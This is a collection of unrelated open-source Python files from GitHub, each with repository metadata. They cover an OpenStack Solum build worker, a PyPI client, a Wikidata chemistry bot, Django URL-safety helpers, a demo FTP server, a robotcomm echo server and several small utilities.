LOG.exception("Exception running unit tests:")
LOG.exception(subex)
if assem is not None:
assem.type = 'app'
wf = objects.registry.Workflow.get_by_assembly_id(assem.id)
upload_task_log(ctxt, logpath, assem, wf.id, 'unittest')
if returncode == 0:
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.UNIT_TESTING_PASSED)
elif returncode > 0:
LOG.error("Unit tests failed. Return code is %r" % (returncode))
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.UNIT_TESTING_FAILED)
elif returncode < 0:
LOG.error("Error running unit tests.")
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.ERROR)
repo_utils.send_status(returncode, status_url, repo_token)
return returncode
def _get_private_key(self, source_creds, source_url):
source_private_key = ''
if source_creds:
cfg.CONF.import_opt('system_param_store',
'solum.api.handlers.plan_handler',
group='api')
store = cfg.CONF.api.system_param_store
if store == 'database':
deploy_keys_str = base64.b64decode(source_creds)
elif store == 'barbican':
client = clients.OpenStackClients(None).barbican().admin_client
secret = client.secrets.get(secret_ref=source_creds)
deploy_keys_str = secret.payload
elif store == 'local_file':
cfg.CONF.import_opt('system_param_file',
'solum.api.handlers.plan_handler',
group='api')
secrets_file = cfg.CONF.api.system_param_file
s = shelve.open(secrets_file)
deploy_keys_str = s[str(source_creds)]
deploy_keys_str = base64.b64decode(deploy_keys_str)
s.close()
deploy_keys = ast.literal_eval(deploy_keys_str)
for dk in deploy_keys:
if source_url == dk['source_url']:
source_private_key = dk['private_key']
return source_private_key
def build_lp(self, ctxt, image_id, git_info, name, source_format,
image_format, artifact_type, lp_params):
LOG.debug("Building languagepack %s" % name)
update_lp_status(ctxt, image_id, name, IMAGE_STATES.BUILDING)
solum.TLS.trace.clear()
solum.TLS.trace.import_context(ctxt)
source_uri = git_info['source_url']
build_cmd = self._get_build_command(ctxt, 'build', source_uri,
name, str(image_id),
source_format, 'docker', '',
artifact_type)
lp_access = get_lp_access_method(ctxt.project_id)
user_env = {}
try:
user_env = self._get_environment(ctxt,
git_info,
lp_access=lp_access)
except exception.SolumException as env_ex:
LOG.exception(_("Failed to successfully get environment for "
"building languagepack: `%s`"),
image_id)
LOG.exception(env_ex)
log_env = user_env.copy()
if 'OS_AUTH_TOKEN' in log_env:
del log_env['OS_AUTH_TOKEN']
if 'OPER_AUTH_TOKEN' in log_env:
del log_env['OPER_AUTH_TOKEN']
if 'OPER_OS_STORAGE_URL' in log_env:
del log_env['OPER_OS_STORAGE_URL']
solum.TLS.trace.support_info(environment=log_env)
logpath = "%s/%s-%s.log" % (user_env['SOLUM_TASK_DIR'],
'languagepack',
user_env['BUILD_ID'])
LOG.debug("Languagepack logs for LP %s stored at %s" %
(image_id, logpath))
out = None
status = IMAGE_STATES.ERROR
image_external_ref = None
docker_image_name = None
try:
try:
out = priv_rootwrap.execute(
*build_cmd, run_as_root=True, env_variables=user_env)[0]
except Exception as e:
LOG.exception("Failed to build languagepack: %s" % image_id)
LOG.exception(e)
out = ''
if isinstance(out, bytes):
out = out.decode('utf-8')
# we expect two lines in the output that looks like:
# image_external_ref=<external storage ref>
# docker_image_name=<DU name>
for line in out.split('\n'):
# Won't break out until we get the final
# matching which is the expected value
if line.startswith('image_external_ref'):
solum.TLS.trace.support_info(build_lp_out_line=line)
image_external_ref = line.replace('image_external_ref=',
'').strip()
elif line.startswith('docker_image_name'):
docker_image_name = line.replace('docker_image_name=', '')
if image_external_ref and docker_image_name:
status = IMAGE_STATES.READY
else:
status = IMAGE_STATES.ERROR
except OSError as subex:
LOG.exception(_("Failed to successfully build languagepack: `%s`"),
image_id)
LOG.exception(subex)
img = get_image_by_id(ctxt, image_id)
img.type = 'languagepack'
update_lp_status(ctxt, image_id, name, status, image_external_ref,
docker_image_name)
upload_task_log(ctxt, logpath, img,
img.uuid, 'languagepack')
|
{
"content_hash": "0454d5dd34b5156ef3c7ea97cabf68ee",
"timestamp": "",
"source": "github",
"line_count": 756,
"max_line_length": 79,
"avg_line_length": 43.51058201058201,
"alnum_prop": 0.5329847388581505,
"repo_name": "openstack/solum",
"id": "096ca19c66e0e05d233811a6998cd529818f4088",
"size": "33505",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "solum/worker/handlers/shell.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1258"
},
{
"name": "Mako",
"bytes": "958"
},
{
"name": "Python",
"bytes": "1135443"
},
{
"name": "Shell",
"bytes": "73599"
}
],
"symlink_target": ""
}
|
import requests
from .exceptions import HTTPError
from .package import json2package
session = requests.Session()
def get(package_name, pypi_server="https://pypi.python.org/pypi/"):
"""
Construct a request to the PyPI server and returns an instance of
:class:`yarg.package.Package`.
:param package_name: case sensitive name of the package on the PyPI server.
:param pypi_server: (option) URL to the PyPI server.
>>> import yarg
>>> package = yarg.get('yarg')
<Package yarg>
"""
if not pypi_server.endswith("/"):
pypi_server = pypi_server + "/"
response = session.get("{0}{1}/json".format(pypi_server,
package_name))
if response.status_code >= 300:
raise HTTPError(status_code=response.status_code,
reason=response.reason)
if hasattr(response.content, 'decode'):
return json2package(response.content.decode())
else:
return json2package(response.content)
|
{
"content_hash": "dc37e87f64139aa3b436f59c90731f7d",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 79,
"avg_line_length": 32.21875,
"alnum_prop": 0.623666343355965,
"repo_name": "kura/yarg",
"id": "11375ce1125b6950220e0ca648acf2f72104678a",
"size": "2163",
"binary": false,
"copies": "1",
"ref": "refs/heads/imgbot",
"path": "yarg/client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "874"
},
{
"name": "Python",
"bytes": "45854"
}
],
"symlink_target": ""
}
|
"""
Bot code for creating chemical items in wikidata from UNII
Adapted from: https://github.com/sebotic/cdk_pywrapper/blob/master/cdk_pywrapper/chemlib.py
"""
import os
import re
import subprocess
import time
import zipfile
import pandas as pd
import wikidataintegrator.wdi_core as wdi_core
data_folder = "unii_data"
def load_unii():
url = 'http://fdasis.nlm.nih.gov/srs/download/srs/UNII_Data.zip'
if not os.path.exists(data_folder):
os.makedirs(data_folder)
subprocess.check_call(["wget", "-N", "-P", data_folder, url])
with zipfile.ZipFile(os.path.join(data_folder, 'UNII_Data.zip'), 'r') as zf:
zf.extractall(data_folder)
for file in os.listdir(data_folder):
if 'Records' in file:
full_file_name = os.path.join(data_folder, file)
os.rename(full_file_name, os.path.join(data_folder, 'unii_data.txt'))
class UNIIMolecule(object):
unii_path = os.path.join(data_folder, 'unii_data.txt')
if not os.path.exists(unii_path):
load_unii()
unii_df = pd.read_csv(unii_path, dtype=str, sep='\t', low_memory=False)
def __init__(self, unii=None, inchi_key=None, verbose=False):
if unii:
ind = UNIIMolecule.unii_df['UNII'].values == unii
else:
ind = UNIIMolecule.unii_df['INCHIKEY'].values == inchi_key
self.data = UNIIMolecule.unii_df.loc[ind, :]
if len(self.data.index) != 1:
raise ValueError('Provided ID did not return a unique UNII')
self.data_index = self.data.index[0]
if verbose:
x = self.data
print(x.common_name)
print(x.stdinchikey)
print(x.stdinchi)
print(x.csid)
@property
def stdinchikey(self):
ikey = self.data.loc[self.data_index, 'INCHIKEY']
if pd.isnull(ikey) and pd.isnull(self.smiles):
return None
return ikey
@property
def stdinchi(self):
if pd.isnull(self.smiles):
return None
@property
def preferred_name(self):
name = self.data.loc[self.data_index, 'PT']
return UNIIMolecule.label_converter(name) if pd.notnull(name) else None
@property
def smiles(self):
smiles = self.data.loc[self.data_index, 'SMILES']
return smiles if pd.notnull(smiles) else None
@property
def molecule_type(self):
molecule_type = self.data.loc[self.data_index, 'UNII_TYPE']
return molecule_type if pd.notnull(molecule_type) else None
@property
def unii(self):
return self.data.loc[self.data_index, 'UNII']
@property
def cas(self):
cas = self.data.loc[self.data_index, 'RN']
return cas if pd.notnull(cas) else None
@property
def einecs(self):
einecs = self.data.loc[self.data_index, 'EC']
return einecs if pd.notnull(einecs) else None
@property
def rxnorm(self):
rxnorm = self.data.loc[self.data_index, 'RXCUI']
return rxnorm if pd.notnull(rxnorm) else None
@property
def nci(self):
nci = self.data.loc[self.data_index, 'NCIT']
return nci if pd.notnull(nci) else None
@property
def umls(self):
umls_cui = self.data.loc[self.data_index, 'UMLS_CUI']
return umls_cui if pd.notnull(umls_cui) else None
@property
def pubchem(self):
pubchem = self.data.loc[self.data_index, 'PUBCHEM']
return pubchem if pd.notnull(pubchem) else None
@property
def label(self):
item_label = self.preferred_name if self.preferred_name else self.unii
return item_label
def to_wikidata(self):
refs = [[
wdi_core.WDItemID(value='Q6593799', prop_nr='P248', is_reference=True), # stated in
wdi_core.WDExternalID(value=self.unii, prop_nr='P652', is_reference=True), # source element
wdi_core.WDTime(time=time.strftime('+%Y-%m-%dT00:00:00Z'), prop_nr='P813', is_reference=True) # retrieved
]]
print('UNII Main label is', self.label)
elements = {
'P652': self.unii,
'P2017': self.smiles,
'P235': self.stdinchikey,
'P231': self.cas,
'P232': self.einecs,
'P1748': self.nci,
'P3345': self.rxnorm
}
if self.smiles and len(self.smiles) > 400:
del elements['P2017']
data = []
for k, v in elements.items():
if not v:
continue
print('{}:'.format(k), v)
if isinstance(v, list) or isinstance(v, set):
for x in v:
data.append(wdi_core.WDString(prop_nr=k, value=x, references=refs))
else:
data.append(wdi_core.WDString(prop_nr=k, value=v, references=refs))
return data
@staticmethod
def label_converter(label):
label = label.lower()
greek_codes = {
'.alpha.': '\u03B1',
'.beta.': '\u03B2',
'.gamma.': '\u03B3',
'.delta.': '\u03B4',
'.epsilon.': '\u03B5',
'.zeta.': '\u03B6 ',
'.eta.': '\u03B7',
'.theta.': '\u03B8',
'.iota.': '\u03B9',
'.kappa.': '\u03BA',
'.lambda.': '\u03BB',
'.mu.': '\u03BC',
'.nu.': '\u03BD',
'.xi.': '\u03BE',
'.omicron.': '\u03BF',
'.pi.': '\u03C0',
'.rho.': '\u03C1',
'.sigma.': '\u03C3',
'.tau.': '\u03C4',
'.upsilon.': '\u03C5',
'.phi.': '\u03C6',
'.chi.': '\u03C7',
'.psi.': '\u03C8',
'.omega.': '\u03C9',
}
for greek_letter, unicode in greek_codes.items():
if greek_letter in label:
label = label.replace(greek_letter, unicode)
match = re.compile('(^|[^a-z])([ezdlnhros]{1}|dl{1})[^a-z]{1}')
while True:
if re.search(match, label):
replacement = label[re.search(match, label).start(): re.search(match, label).end()].upper()
label = re.sub(match, repl=replacement, string=label, count=1)
else:
break
splits = label.split(', ')
splits.reverse()
return ''.join(splits)
|
{
"content_hash": "2f6ebc5c42160480de20f9757f032eb5",
"timestamp": "",
"source": "github",
"line_count": 211,
"max_line_length": 118,
"avg_line_length": 30.023696682464454,
"alnum_prop": 0.5486977111286504,
"repo_name": "SuLab/scheduled-bots",
"id": "16fdee39cd883f89161a868d7235ae222ccc5b86",
"size": "6335",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "scheduled_bots/drugs/unii.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1296"
},
{
"name": "Jupyter Notebook",
"bytes": "1049300"
},
{
"name": "Python",
"bytes": "709603"
},
{
"name": "Shell",
"bytes": "5313"
}
],
"symlink_target": ""
}
|
import urlparse
import functools
from django.utils.decorators import method_decorator
from django.core.exceptions import SuspiciousOperation
def class_view_decorator(function_decorator):
"""
Convert a function based decorator into a class based decorator usable
on class based Views.
Follows the general idea from `https://docs.djangoproject.com/en/dev/topics/
class-based-views/#decorating-the-class`.
Can't subclass the `View` as it breaks inheritance (super in particular),
so we monkey-patch instead.
"""
def simple_decorator(View):
View.dispatch = method_decorator(function_decorator)(View.dispatch)
return View
return simple_decorator
def default_redirect(request, fallback_url, **kwargs):
redirect_field_name = kwargs.get("redirect_field_name", "next")
next = request.REQUEST.get(redirect_field_name)
if not next:
# try the session if available
if hasattr(request, "session"):
session_key_value = kwargs.get("session_key_value", "redirect_to")
next = request.session.get(session_key_value)
is_safe = functools.partial(
ensure_safe_url,
allowed_protocols=kwargs.get("allowed_protocols"),
allowed_host=request.get_host()
)
redirect_to = next if next and is_safe(next) else fallback_url
# perform one last check to ensure the URL is safe to redirect to. if it
# is not then we should bail here as it is likely developer error and
# they should be notified
is_safe(redirect_to, raise_on_fail=True)
return redirect_to
def ensure_safe_url(url, allowed_protocols=None, allowed_host=None, raise_on_fail=False):
if allowed_protocols is None:
allowed_protocols = ["http", "https"]
parsed = urlparse.urlparse(url)
# perform security checks to ensure no malicious intent
# (i.e., an XSS attack with a data URL)
safe = True
if parsed.scheme and parsed.scheme not in allowed_protocols:
if raise_on_fail:
raise SuspiciousOperation("Unsafe redirect to URL with protocol '%s'" % parsed.scheme)
safe = False
if allowed_host and parsed.netloc and parsed.netloc != allowed_host:
if raise_on_fail:
raise SuspiciousOperation("Unsafe redirect to URL not matching host '%s'" % allowed_host)
safe = False
return safe
|
{
"content_hash": "7f7c742391c94235535d576818587169",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 101,
"avg_line_length": 38.20967741935484,
"alnum_prop": 0.6893203883495146,
"repo_name": "indexofire/gork",
"id": "f821959b8180b7c2f5f25dae92107ce3b4600a3b",
"size": "2393",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/gork/contrib/gbase/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "199039"
},
{
"name": "JavaScript",
"bytes": "89817"
},
{
"name": "Python",
"bytes": "1120919"
},
{
"name": "Shell",
"bytes": "6713"
}
],
"symlink_target": ""
}
|
"""
Copyright 2013 OpERA
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from gnuradio import digital #pylint: disable=F0401
from device import UHDGenericArch #pylint: disable=F0401
from utils import Logger #pylint: disable=F0401
#::TODO:: descricao da classe e de seus metodos
class SNREstimator(UHDGenericArch):
"""
"""
SIMPLE = 0
SKEW = 1
MOMENT = 2
SVR = 3
def __init__(self,
name="SNREstimator",
algorithm=SVR,
alpha=0.001):
"""
CTOR
@param name
@param algorithm
@param alpha
"""
self._estimator = digital.probe_mpsk_snr_est_c(algorithm, 10000, alpha)
UHDGenericArch.__init__(self,
name=name,
input_signature=self._estimator.input_signature(),
output_signature=self._estimator.output_signature())
Logger.register(name, ['snr', ])
self.register_scheduling(lambda: Logger.append(name, 'snr', self.get_snr()), delay_sec=0.2) #pylint: disable=E1101
#::TODO:: pq tem os parametros input e output signature, se eles nao estao sendo usados?
def _build(self, input_signature, output_signature):
"""
@param input_signature
@param output_signature
"""
return self._estimator
def get_snr(self):
"""
"""
return self._estimator.snr()
|
{
"content_hash": "bec10ae2f5655aa8011ee6809266ec28",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 123,
"avg_line_length": 29.220588235294116,
"alnum_prop": 0.6109713135379969,
"repo_name": "ComputerNetworks-UFRGS/OpERA",
"id": "10beb830bed912d9e4b74e2e37be8d7a969c622a",
"size": "1987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/gr_blocks/utils/snrEstimator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AMPL",
"bytes": "1555"
},
{
"name": "C",
"bytes": "1049"
},
{
"name": "C++",
"bytes": "6177"
},
{
"name": "CMake",
"bytes": "59994"
},
{
"name": "Python",
"bytes": "1125235"
},
{
"name": "Shell",
"bytes": "5532"
}
],
"symlink_target": ""
}
|
"""Program to convert power logging config from a servo_ina device
to a sweetberry config.
"""
# Note: This is a py2/3 compatible file.
from __future__ import print_function
import os
import sys
def fetch_records(basename):
"""Import records from servo_ina file.
servo_ina files are python imports, and have a list of tuples with
the INA data.
(inatype, i2caddr, rail name, bus voltage, shunt ohms, mux, True)
Args:
basename: python import name (filename -.py)
Returns:
list of tuples as described above.
"""
ina_desc = __import__(basename)
return ina_desc.inas
def main(argv):
if len(argv) != 2:
print("usage:")
print(" %s input.py" % argv[0])
return
inputf = argv[1]
basename = os.path.splitext(inputf)[0]
outputf = basename + ".board"
outputs = basename + ".scenario"
print("Converting %s to %s, %s" % (inputf, outputf, outputs))
inas = fetch_records(basename)
boardfile = open(outputf, "w")
scenario = open(outputs, "w")
boardfile.write("[\n")
scenario.write("[\n")
start = True
for rec in inas:
if start:
start = False
else:
boardfile.write(",\n")
scenario.write(",\n")
record = (
' {"name": "%s", "rs": %f, "sweetberry": "A", "channel": %d}'
% (
rec[2],
rec[4],
rec[1] - 64,
)
)
boardfile.write(record)
scenario.write('"%s"' % rec[2])
boardfile.write("\n")
boardfile.write("]")
scenario.write("\n")
scenario.write("]")
if __name__ == "__main__":
main(sys.argv)
|
{
"content_hash": "3c7eda8ca46f0566b96df545a8916c92",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 74,
"avg_line_length": 21.846153846153847,
"alnum_prop": 0.5434272300469484,
"repo_name": "coreboot/chrome-ec",
"id": "1deb75cda441e9673ee77be9066e74eb8dafdb33",
"size": "1869",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "extra/usb_power/convert_servo_ina.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "153372"
},
{
"name": "C",
"bytes": "25514204"
},
{
"name": "C++",
"bytes": "617015"
},
{
"name": "CMake",
"bytes": "114317"
},
{
"name": "Emacs Lisp",
"bytes": "136"
},
{
"name": "Go",
"bytes": "40545"
},
{
"name": "HTML",
"bytes": "602017"
},
{
"name": "Makefile",
"bytes": "247601"
},
{
"name": "Pawn",
"bytes": "3004"
},
{
"name": "Python",
"bytes": "1006209"
},
{
"name": "Shell",
"bytes": "138354"
},
{
"name": "SourcePawn",
"bytes": "3051"
},
{
"name": "Tcl",
"bytes": "5238"
}
],
"symlink_target": ""
}
|
import six
from rip.schema.base_field import BaseField, FieldTypes
from rip.schema.sub_resource_field import SubResourceField
class ApiSchemaOptions(object):
def __init__(self, meta_options, fields, declared_fields):
if meta_options:
for override_name in dir(meta_options):
override = getattr(meta_options, override_name)
setattr(self, override_name, override)
self.fields = fields
self.declared_fields = declared_fields
class ApiSchemaMetaClass(type):
def __new__(cls, name, bases, attrs):
fields = {}
declared_fields = {}
# Inherit any fields from parent(s).
try:
parents = [b for b in bases if issubclass(b, ApiSchema)]
# Simulate the MRO.
parents.reverse()
for p in parents:
meta_on_parent = getattr(p, '_meta', None)
fields_declared_on_parent = meta_on_parent.fields if meta_on_parent else {}
for field_name, field in fields_declared_on_parent.items():
fields[field_name] = field
except NameError:
pass
for field_name, field in attrs.copy().items():
# Runs only once during class construction.
# Copy should not be a performance hit.
if isinstance(field, BaseField):
field = attrs.pop(field_name)
declared_fields[field_name] = field
fields.update(declared_fields)
new_class = super(ApiSchemaMetaClass, cls).__new__(cls, name, bases,
attrs)
for field_name, field in fields.items():
field.schema_cls = new_class
meta = getattr(new_class, 'Meta', None)
new_class._meta = ApiSchemaOptions(meta, fields, declared_fields)
return new_class
class ApiSchema(six.with_metaclass(ApiSchemaMetaClass)):
def __new__(cls, *args, **kwargs):
if not hasattr(cls._meta, 'schema_name'):
raise TypeError(
'Missing meta property `schema_name` on Schema `{schema_cls}`'
.format(schema_cls=cls.__name__))
obj = super(ApiSchema, cls).__new__(cls, *args, **kwargs)
return obj
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __eq__(self, value):
for field_name, field_object in self._meta.fields.items():
if getattr(self, field_name) != getattr(value, field_name):
return False
return True
@classmethod
def non_readonly_fields(cls):
return {field_name: field for field_name, field in
cls._meta.fields.items()
if field.field_type != FieldTypes.READONLY}
@classmethod
def updatable_fields(cls):
return {field_name: field for field_name, field in
cls._meta.fields.items()
if field.field_type == FieldTypes.DEFAULT}
@classmethod
def sub_resource_fields(cls):
return {field_name: field for field_name, field in
cls._meta.fields.items()
if isinstance(field, SubResourceField)}
@classmethod
def list_fields(cls):
return {field_name: field for field_name, field in
cls._meta.fields.items()
if field.show_in_list}
|
{
"content_hash": "87e5087671cdd84be981d3b8745dad46",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 91,
"avg_line_length": 34.27,
"alnum_prop": 0.5736796031514444,
"repo_name": "Aplopio/django_rip",
"id": "9c357c665a37ee02d3b719ee5680f9540886d1ba",
"size": "3427",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "rip/api_schema.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1455"
},
{
"name": "Python",
"bytes": "446585"
}
],
"symlink_target": ""
}
|
from django.apps import AppConfig
class DuckConfig(AppConfig):
name = 'duck'
|
{
"content_hash": "82841082ee7cd528b5f86fd716b6f7d9",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 33,
"avg_line_length": 16.6,
"alnum_prop": 0.7349397590361446,
"repo_name": "lastcoolnameleft/duckiehunt",
"id": "dac60ff2216143273eb6354f40878126cafcdca6",
"size": "83",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/duck/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3346"
},
{
"name": "Dockerfile",
"bytes": "416"
},
{
"name": "HTML",
"bytes": "138998"
},
{
"name": "Mustache",
"bytes": "516"
},
{
"name": "Python",
"bytes": "27016"
},
{
"name": "Shell",
"bytes": "432"
}
],
"symlink_target": ""
}
|
import opengm
import numpy
#---------------------------------------------------------------
# MinSum with SelfFusion
#---------------------------------------------------------------
numpy.random.seed(42)
gm=opengm.loadGm("/home/tbeier/models/mrf-inpainting/house-gm.h5","gm")
#---------------------------------------------------------------
# Minimize
#---------------------------------------------------------------
#get an instance of the optimizer / inference-algorithm
inf = opengm.inference.CheapInitialization(gm)
inf.infer()
arg = inf.arg()
print gm.evaluate(arg)
infParam = opengm.InfParam(
numIt=2000,
generator='upDown'
)
inf=opengm.inference.FusionBased(gm, parameter=infParam)
inf.setStartingPoint(arg)
# start inference (in this case verbose infernce)
visitor=inf.verboseVisitor(printNth=1,multiline=True)
inf.infer(visitor)
arg = inf.arg()
|
{
"content_hash": "135973a0d0eec9bb1d83af15cedc29be",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 71,
"avg_line_length": 25.647058823529413,
"alnum_prop": 0.5344036697247706,
"repo_name": "recarroll/opengm",
"id": "a264d6bc574ffc48a962d89b5b4714e3293d2695",
"size": "872",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/interfaces/python/examples/inference_fusion_based.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "297"
},
{
"name": "C++",
"bytes": "5076662"
},
{
"name": "CMake",
"bytes": "127021"
},
{
"name": "Matlab",
"bytes": "31703"
},
{
"name": "Python",
"bytes": "229370"
},
{
"name": "Shell",
"bytes": "150"
}
],
"symlink_target": ""
}
|
"""A basic FTP server which uses a DummyAuthorizer for managing 'virtual
users', setting a limit for incoming connections.
"""
import os
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
def main():
# Instantiate a dummy authorizer for managing 'virtual' users
authorizer = DummyAuthorizer()
# Define a new user having full r/w permissions and a read-only
# anonymous user
authorizer.add_user('user', '12345', os.getcwd(), perm='elradfmwM')
authorizer.add_anonymous(os.getcwd())
# Instantiate FTP handler class
handler = FTPHandler
handler.authorizer = authorizer
# Define a customized banner (string returned when client connects)
handler.banner = "pyftpdlib based ftpd ready."
# Specify a masquerade address and the range of ports to use for
# passive connections. Decomment in case you're behind a NAT.
# handler.masquerade_address = '151.25.42.11'
# handler.passive_ports = range(60000, 65535)
# Instantiate FTP server class and listen on 0.0.0.0:2121
address = ('', 6666)
server = FTPServer(address, handler)
# set a limit for connections
server.max_cons = 256
server.max_cons_per_ip = 5
# start ftp server
server.serve_forever()
if __name__ == '__main__':
main()
|
{
"content_hash": "679f7228ef04bff735bbeec6a13039a8",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 72,
"avg_line_length": 29.58695652173913,
"alnum_prop": 0.7046289493019838,
"repo_name": "kugg/micromaker",
"id": "bb2a387a8fb8e750d5ac5371c59f3648bc75078b",
"size": "1540",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "attacker/basic_ftpd.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4560"
},
{
"name": "Shell",
"bytes": "509"
}
],
"symlink_target": ""
}
|
import ConfigParser
class Tenant():
def __init__(self):
self.config = ConfigParser.ConfigParser()
def load_properties(self, project_name=None):
self.config.read('igor.ini')
def get_property(self, name, default=None):
try:
value = self.config.get('igor', name)
if value is None:
return default
except ConfigParser.NoOptionError:
return default
return self.config.get('igor', name)
|
{
"content_hash": "dc4dd0b70c4de6ef8b60df907f8aa112",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 49,
"avg_line_length": 27.11111111111111,
"alnum_prop": 0.5942622950819673,
"repo_name": "wdsx/igor",
"id": "b1365653c714c50f3dcbe2f1c350600e7adfa795",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wds/landlord/landlord.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2030"
},
{
"name": "HTML",
"bytes": "1813"
},
{
"name": "Python",
"bytes": "81677"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('movielists', '0006_auto_20150412_1316'),
]
operations = [
migrations.AlterField(
model_name='movie',
name='image',
field=models.ImageField(upload_to=b'../../media', blank=True),
preserve_default=True,
),
]
|
{
"content_hash": "650ed45d79c119609c8e75fbef97220d",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 74,
"avg_line_length": 23.05263157894737,
"alnum_prop": 0.5844748858447488,
"repo_name": "kiriakosv/movie-recommendator",
"id": "7e7b1dcccd58e4990efd937f1594fbfbb8b6429f",
"size": "462",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "moviesite/movielists/migrations/0007_auto_20150412_1319.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2101"
},
{
"name": "HTML",
"bytes": "9505"
},
{
"name": "Python",
"bytes": "36726"
}
],
"symlink_target": ""
}
|
"""
rcecho - runs a robotcomm echo server as a console application.
Author: JMJ
"""
import argparse
import logging
import pprint
import re
import sys
import time
from robotutils import logging_helper
from robotutils.comm_helper import EchoServer
_LOGGER = logging.getLogger('rcecho')
_TRACE = logging_helper.LevelSpecificLogger(logging_helper.TRACELEVEL, _LOGGER)
def generate_argparser():
"""Generate the argument parser for this utility"""
parser = argparse.ArgumentParser(description='Robotcomm echo server',
allow_abbrev=False)
# Just one positional argument
parser.add_argument('server_address', help='hostname[:port] of this server')
parser.add_argument('-c', dest='channel', metavar='CHANNEL',
help='name of channel')
choices_text = "TRACE DEBUG INFO WARNING ERROR CRITICAL"
choices_list = choices_text.split()
loglevel_help = 'sets logging level. LOGLEVEL is one of: ' + choices_text
parser.add_argument('-loglevel', default='ERROR', choices=choices_list,
help=loglevel_help)
return parser
def parse_args(args):
"""Parse input args, including all error handling.
Returns a parameters object on success. Exits program
on failure.
"""
parser = generate_argparser()
params = parser.parse_args(args)
try:
hostname, port = parse_address(params.server_address)
params.hostname = hostname
params.port = port
except ValueError as exp:
parser.error(str(exp))
return params
# Note: IPV6 addresses are not supported - it would
# be extra work to distinguish a port from a ':' inside
# the IPv6 address.
_HOSTNAME_REGEX = re.compile(r'(\w|\.)+')
_PORTRANGE = 41 # Range 41000-41999
def parse_address(address):
"""Parse address of the form hostname[:port]"""
errmsg = '\n'.join(("Invalid address '{}'".format(address),
"Hostname should have the form NAME_OR_IP[:PORT]"))
hostname, *rest = address.split(':')
if not _HOSTNAME_REGEX.fullmatch(hostname) or len(rest) > 1:
raise ValueError(errmsg)
port = int(rest[0]) if rest else None
if port is not None and port//1000 != _PORTRANGE:
msg = "Port must be in the range {} to {}"
minport = _PORTRANGE*1000
raise ValueError(msg.format(minport, minport+999))
return (hostname, port)
def send_messages(client, count):
"""Send messages using an instance of echo client"""
receive_count = 0
def send_handler(resptype, respbody):
msg = "Sending: '{}::{}'".format(resptype, respbody)
_TRACE(msg)
print(msg)
def response_handler(resptype, respbody):
msg = "Response: '{}::{}'".format(resptype, respbody)
_TRACE(msg)
print(msg)
nonlocal receive_count
receive_count += 1 # assume call to hander is serialized
# send_messages will block until done...
_TRACE("GOING TO SEND MESSAGES")
client.send_messages(count, send_handler=send_handler,
response_handler=response_handler)
_TRACE("DONE SENDING MESSAGES")
print("Received = {}".format(receive_count))
def set_loglevel(strloglevel):
"""Sets up logging with the specified logging level"""
if strloglevel == 'TRACE':
# Special case - not defined in logging module
level = logging_helper.TRACELEVEL
else:
choices = "DEBUG INFO WARNING ERROR CRITICAL".split()
index = choices.index(strloglevel)
level = getattr(logging, choices[index])
logging.basicConfig(level=level)
def main(args):
"""Main entry point"""
params = parse_args(args)
set_loglevel(params.loglevel)
_LOGGER.info("parameters:\n%s", pprint.pformat(vars(params)))
server = EchoServer(params.hostname)
server.start()
try:
while True:
server.periodic_work()
time.sleep(0.1)
except KeyboardInterrupt:
_LOGGER.info("KeyboardInterrupt raised. Quitting")
finally:
server.stop()
main(sys.argv[1:])
|
{
"content_hash": "13976e7f5014ad7afc9e670e3e14dcd7",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 80,
